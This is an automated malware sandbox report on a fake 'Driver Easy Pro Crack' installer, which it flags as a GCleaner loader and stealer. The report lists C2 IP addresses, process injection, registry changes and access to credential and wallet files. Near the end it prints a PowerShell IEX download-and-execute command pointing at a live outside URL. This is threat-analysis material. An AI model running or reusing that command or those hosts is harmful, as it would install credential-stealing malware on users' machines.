gcleaner | 8b57ba1b6222d9061bc7548874aa1a7dfc846e79b0c0d2b64dfb62900337ae1b

Analysis

max time kernel
98s
max time network
102s
platform
windows10-2004_x64
resource
win10v2004-20230220-es
resource tags

arch:x64arch:x86image:win10v2004-20230220-eslocale:es-esos:windows10-2004-x64systemwindows
submitted
18-03-2023 18:00

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

Driver Easy Pro Crack.exe
Size

1.7MB
MD5

004c3aa112c49b35f9cafc4e2ba164e8
SHA1

cfcd2539fc5edfb8d36877d082ec65e6f918814c
SHA256

af03c1abaef7a6da4aedc600e8b92bf82fca6ae4b9c1efc628caf5d0f21acb37
SHA512

b6f0003e295583337f80f6611db21caa1c3b5345117fab42f952b87f5bac0ec45c7ef6d72f8f75d183444e0640b4a1a84b636af5ab6a8cdfdbfa0e39cc684e98
SSDEEP

24576:dJr8tE+AIWnUuzbkCEIz4Kvb/bIVYjmOIvm0ZDzMYxSGcDqhSALxG1yNtVPDc3IC:dJ4gFsMv/IIv0ZDgYQvDD+5PDcY07

Score

10^/10

gcleaner loader spyware stealer

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://neutropharma.com/wp/wp-content/debug2.ps1

Extracted

Family

gcleaner

45.12.253.56

45.12.253.72

45.12.253.98

45.12.253.75

Signatures

GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3308 1516 rundll32.exe
Blocklisted process makes network request 3 IoCs

Processes:

powershell.exe

flow pid process

58 956 powershell.exe
61 956 powershell.exe
72 956 powershell.exe
Downloads MZ/PE file

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3308	1516	rundll32.exe

flow	pid	process
58	956	powershell.exe
61	956	powershell.exe
72	956	powershell.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Crack.exesqlcmd.exelower.exeDriver Easy Pro Crack.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	Crack.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	sqlcmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	lower.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation	Driver Easy Pro Crack.exe

Drops startup file 2 IoCs

Processes:

97BC.tmp.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gFvO4Xt2e.exe	97BC.tmp.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gFvO4Xt2e.exe	97BC.tmp.exe

Executes dropped EXE 7 IoCs

Processes:

Crack.exeCrack.exesoft.exesqlcmd.exe97BC.tmp.exeKiffAppE2.exelower.exe

pid process

1284 Crack.exe
1304 Crack.exe
4052 soft.exe
1828 sqlcmd.exe
4896 97BC.tmp.exe
900 KiffAppE2.exe
2256 lower.exe
Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

1876 rundll32.exe
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

63 api.ipify.org
64 api.ipify.org
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
1284	Crack.exe
1304	Crack.exe
4052	soft.exe
1828	sqlcmd.exe
4896	97BC.tmp.exe
900	KiffAppE2.exe
2256	lower.exe

pid	process
1876	rundll32.exe

flow	ioc
63	api.ipify.org
64	api.ipify.org

Program crash 10 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2072	1876	WerFault.exe	rundll32.exe
4280	2256	WerFault.exe	lower.exe
2396	2256	WerFault.exe	lower.exe
4396	2256	WerFault.exe	lower.exe
1152	2256	WerFault.exe	lower.exe
4340	2256	WerFault.exe	lower.exe
4916	2256	WerFault.exe	lower.exe
996	2256	WerFault.exe	lower.exe
776	2256	WerFault.exe	lower.exe
3904	2256	WerFault.exe	lower.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

4196 taskkill.exe

pid	process
4196	taskkill.exe

Modifies data under HKEY_USERS 15 IoCs

Processes:

LogonUI.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "192"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe

Modifies registry class 44 IoCs

Processes:

Crack.exeCrack.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{069D06BB-F6A9-428D-9070-FCFF8F5BC5F4}	Crack.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{069D06BB-F6A9-428D-9070-FCFF8F5BC5F4}\ = "sqltest.Application"	Crack.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{069D06BB-F6A9-428D-9070-FCFF8F5BC5F4}\LocalServer32	Crack.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6BE54215-DFC6-4D78-BF1A-E1F869104825}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	Crack.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\sqltest.Application\CLSID\ = "{069D06BB-F6A9-428D-9070-FCFF8F5BC5F4}"	Crack.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{069D06BB-F6A9-428D-9070-FCFF8F5BC5F4}\ProgID	Crack.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{069D06BB-F6A9-428D-9070-FCFF8F5BC5F4}\InprocHandler32	Crack.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{069D06BB-F6A9-428D-9070-FCFF8F5BC5F4}\ProgID	Crack.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{069D06BB-F6A9-428D-9070-FCFF8F5BC5F4}\InprocHandler32\ = "ole32.dll"	Crack.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6BE54215-DFC6-4D78-BF1A-E1F869104825}\TypeLib\ = "{B4BD8AC7-1474-45B9-87B4-845611FD1CAD}"	Crack.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6BE54215-DFC6-4D78-BF1A-E1F869104825}\TypeLib\Version = "1.0"	Crack.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6BE54215-DFC6-4D78-BF1A-E1F869104825}\TypeLib\Version = "1.0"	Crack.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sqltest.Application\CLSID	Crack.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{069D06BB-F6A9-428D-9070-FCFF8F5BC5F4}\InprocHandler32\ = "ole32.dll"	Crack.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sqltest.Application	Crack.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{069D06BB-F6A9-428D-9070-FCFF8F5BC5F4}\InprocHandler32	Crack.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B4BD8AC7-1474-45B9-87B4-845611FD1CAD}\1.0\0\win32	Crack.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B4BD8AC7-1474-45B9-87B4-845611FD1CAD}\1.0\HELPDIR\	Crack.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{069D06BB-F6A9-428D-9070-FCFF8F5BC5F4}\LocalServer32	Crack.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\sqltest.Application\ = "sqltest.Application"	Crack.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B4BD8AC7-1474-45B9-87B4-845611FD1CAD}\1.0	Crack.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B4BD8AC7-1474-45B9-87B4-845611FD1CAD}\1.0\ = "sqltest"	Crack.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6BE54215-DFC6-4D78-BF1A-E1F869104825}\ = "Isqltest"	Crack.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6BE54215-DFC6-4D78-BF1A-E1F869104825}	Crack.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sqltest.Application\CLSID	Crack.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6BE54215-DFC6-4D78-BF1A-E1F869104825}\TypeLib	Crack.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6BE54215-DFC6-4D78-BF1A-E1F869104825}\ProxyStubClsid32	Crack.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6BE54215-DFC6-4D78-BF1A-E1F869104825}\TypeLib	Crack.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{069D06BB-F6A9-428D-9070-FCFF8F5BC5F4}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\Crack.exe"	Crack.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{069D06BB-F6A9-428D-9070-FCFF8F5BC5F4}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\Crack.exe"	Crack.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B4BD8AC7-1474-45B9-87B4-845611FD1CAD}	Crack.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B4BD8AC7-1474-45B9-87B4-845611FD1CAD}\1.0\FLAGS\ = "0"	Crack.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B4BD8AC7-1474-45B9-87B4-845611FD1CAD}\1.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\Crack.exe"	Crack.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6BE54215-DFC6-4D78-BF1A-E1F869104825}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	Crack.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\sqltest.Application\CLSID\ = "{069D06BB-F6A9-428D-9070-FCFF8F5BC5F4}"	Crack.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B4BD8AC7-1474-45B9-87B4-845611FD1CAD}\1.0\0	Crack.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B4BD8AC7-1474-45B9-87B4-845611FD1CAD}\1.0\HELPDIR	Crack.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6BE54215-DFC6-4D78-BF1A-E1F869104825}\ = "Isqltest"	Crack.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6BE54215-DFC6-4D78-BF1A-E1F869104825}\TypeLib\ = "{B4BD8AC7-1474-45B9-87B4-845611FD1CAD}"	Crack.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{069D06BB-F6A9-428D-9070-FCFF8F5BC5F4}\ProgID\ = "sqltest.Application"	Crack.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{069D06BB-F6A9-428D-9070-FCFF8F5BC5F4}\ProgID\ = "sqltest.Application"	Crack.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{B4BD8AC7-1474-45B9-87B4-845611FD1CAD}\1.0\FLAGS	Crack.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6BE54215-DFC6-4D78-BF1A-E1F869104825}	Crack.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6BE54215-DFC6-4D78-BF1A-E1F869104825}\ProxyStubClsid32	Crack.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

3744 PING.EXE
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 16 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

pid	process
3744	PING.EXE

description	flow	ioc
HTTP User-Agent header	16	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

soft.exepowershell.exe

pid	process
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
4052	soft.exe
956	powershell.exe
956	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

soft.exepowershell.exeKiffAppE2.exepowershell.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	4052	soft.exe
Token: SeDebugPrivilege	956	powershell.exe
Token: SeDebugPrivilege	900	KiffAppE2.exe
Token: SeDebugPrivilege	828	powershell.exe
Token: SeDebugPrivilege	4196	taskkill.exe

Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

Crack.exeCrack.exeLogonUI.exe

pid process

1284 Crack.exe
1284 Crack.exe
1304 Crack.exe
1304 Crack.exe
368 LogonUI.exe

pid	process
1284	Crack.exe
1284	Crack.exe
1304	Crack.exe
1304	Crack.exe
368	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Driver Easy Pro Crack.exeCrack.exesoft.exe

description	pid	process	target process
PID 1000 wrote to memory of 1284	1000	Driver Easy Pro Crack.exe	Crack.exe
PID 1000 wrote to memory of 1284	1000	Driver Easy Pro Crack.exe	Crack.exe
PID 1000 wrote to memory of 1284	1000	Driver Easy Pro Crack.exe	Crack.exe
PID 1284 wrote to memory of 1304	1284	Crack.exe	Crack.exe
PID 1284 wrote to memory of 1304	1284	Crack.exe	Crack.exe
PID 1284 wrote to memory of 1304	1284	Crack.exe	Crack.exe
PID 1000 wrote to memory of 4052	1000	Driver Easy Pro Crack.exe	soft.exe
PID 1000 wrote to memory of 4052	1000	Driver Easy Pro Crack.exe	soft.exe
PID 4052 wrote to memory of 4588	4052	soft.exe	AddInProcess.exe
PID 4052 wrote to memory of 4588	4052	soft.exe	AddInProcess.exe
PID 4052 wrote to memory of 1164	4052	soft.exe	DataSvcUtil.exe
PID 4052 wrote to memory of 1164	4052	soft.exe	DataSvcUtil.exe
PID 4052 wrote to memory of 2396	4052	soft.exe	RegSvcs.exe
PID 4052 wrote to memory of 2396	4052	soft.exe	RegSvcs.exe
PID 4052 wrote to memory of 3064	4052	soft.exe	Microsoft.Workflow.Compiler.exe
PID 4052 wrote to memory of 3064	4052	soft.exe	Microsoft.Workflow.Compiler.exe
PID 4052 wrote to memory of 1608	4052	soft.exe	csc.exe
PID 4052 wrote to memory of 1608	4052	soft.exe	csc.exe
PID 4052 wrote to memory of 1660	4052	soft.exe	AppLaunch.exe
PID 4052 wrote to memory of 1660	4052	soft.exe	AppLaunch.exe
PID 4052 wrote to memory of 216	4052	soft.exe	ilasm.exe
PID 4052 wrote to memory of 216	4052	soft.exe	ilasm.exe
PID 4052 wrote to memory of 236	4052	soft.exe	aspnet_regbrowsers.exe
PID 4052 wrote to memory of 236	4052	soft.exe	aspnet_regbrowsers.exe
PID 4052 wrote to memory of 228	4052	soft.exe	aspnet_regiis.exe
PID 4052 wrote to memory of 228	4052	soft.exe	aspnet_regiis.exe
PID 4052 wrote to memory of 2816	4052	soft.exe	ServiceModelReg.exe
PID 4052 wrote to memory of 2816	4052	soft.exe	ServiceModelReg.exe
PID 4052 wrote to memory of 4900	4052	soft.exe	ComSvcConfig.exe
PID 4052 wrote to memory of 4900	4052	soft.exe	ComSvcConfig.exe
PID 4052 wrote to memory of 4472	4052	soft.exe	InstallUtil.exe
PID 4052 wrote to memory of 4472	4052	soft.exe	InstallUtil.exe
PID 4052 wrote to memory of 3004	4052	soft.exe	aspnet_state.exe
PID 4052 wrote to memory of 3004	4052	soft.exe	aspnet_state.exe
PID 4052 wrote to memory of 4700	4052	soft.exe	aspnet_compiler.exe
PID 4052 wrote to memory of 4700	4052	soft.exe	aspnet_compiler.exe
PID 4052 wrote to memory of 1044	4052	soft.exe	mscorsvw.exe
PID 4052 wrote to memory of 1044	4052	soft.exe	mscorsvw.exe
PID 4052 wrote to memory of 2144	4052	soft.exe	jsc.exe
PID 4052 wrote to memory of 2144	4052	soft.exe	jsc.exe
PID 4052 wrote to memory of 2144	4052	soft.exe	jsc.exe
PID 4052 wrote to memory of 3472	4052	soft.exe	RegAsm.exe
PID 4052 wrote to memory of 3472	4052	soft.exe	RegAsm.exe
PID 4052 wrote to memory of 4004	4052	soft.exe	MSBuild.exe
PID 4052 wrote to memory of 4004	4052	soft.exe	MSBuild.exe
PID 4052 wrote to memory of 3672	4052	soft.exe	cvtres.exe
PID 4052 wrote to memory of 3672	4052	soft.exe	cvtres.exe
PID 4052 wrote to memory of 4112	4052	soft.exe	dfsvc.exe
PID 4052 wrote to memory of 4112	4052	soft.exe	dfsvc.exe
PID 4052 wrote to memory of 4752	4052	soft.exe	SMSvcHost.exe
PID 4052 wrote to memory of 4752	4052	soft.exe	SMSvcHost.exe
PID 4052 wrote to memory of 4544	4052	soft.exe	EdmGen.exe
PID 4052 wrote to memory of 4544	4052	soft.exe	EdmGen.exe
PID 4052 wrote to memory of 4412	4052	soft.exe	aspnet_regsql.exe
PID 4052 wrote to memory of 4412	4052	soft.exe	aspnet_regsql.exe
PID 4052 wrote to memory of 2076	4052	soft.exe	vbc.exe
PID 4052 wrote to memory of 2076	4052	soft.exe	vbc.exe
PID 4052 wrote to memory of 4492	4052	soft.exe	WsatConfig.exe
PID 4052 wrote to memory of 4492	4052	soft.exe	WsatConfig.exe
PID 4052 wrote to memory of 4688	4052	soft.exe	CasPol.exe
PID 4052 wrote to memory of 4688	4052	soft.exe	CasPol.exe
PID 4052 wrote to memory of 4316	4052	soft.exe	AddInProcess32.exe
PID 4052 wrote to memory of 4316	4052	soft.exe	AddInProcess32.exe
PID 4052 wrote to memory of 4316	4052	soft.exe	AddInProcess32.exe

C:\Users\Admin\AppData\Local\Temp\Driver Easy Pro Crack.exe
"C:\Users\Admin\AppData\Local\Temp\Driver Easy Pro Crack.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1000

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1284

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe" -h
3⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1304

C:\Users\Admin\AppData\Local\Temp\RarSFX0\soft.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\soft.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4052

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe"
3⤵
PID:4588

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\DataSvcUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\DataSvcUtil.exe"
3⤵
PID:1164

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe"
3⤵
PID:2396

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe"
3⤵
PID:3064

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"
3⤵
PID:1608

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe"
3⤵
PID:1660

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe"
3⤵
PID:216

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe"
3⤵
PID:236

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe"
3⤵
PID:228

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelReg.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelReg.exe"
3⤵
PID:2816

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe"
3⤵
PID:4900

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
3⤵
PID:4472

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe"
3⤵
PID:3004

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"
3⤵
PID:4700

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe"
3⤵
PID:1044

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe"
3⤵
PID:2144

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe"
3⤵
PID:3472

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe"
3⤵
PID:4004

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe"
3⤵
PID:3672

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
3⤵
PID:4112

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe"
3⤵
PID:4752

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\EdmGen.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\EdmGen.exe"
3⤵
PID:4544

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regsql.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regsql.exe"
3⤵
PID:4412

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"
3⤵
PID:2076

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WsatConfig.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WsatConfig.exe"
3⤵
PID:4492

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe"
3⤵
PID:4688

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe"
3⤵
PID:4316

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe"
3⤵
PID:2512

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe"
3⤵
PID:4520

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInUtil.exe"
3⤵
PID:4396

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe"
3⤵
PID:4464

C:\Users\Admin\AppData\Local\Temp\RarSFX0\sqlcmd.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\sqlcmd.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
PID:1828

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://neutropharma.com/wp/wp-content/debug2.ps1')"
3⤵
PID:4064

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command IEX(New-Object Net.Webclient).DownloadString('https://neutropharma.com/wp/wp-content/debug2.ps1')
4⤵
- Blocklisted process makes network request
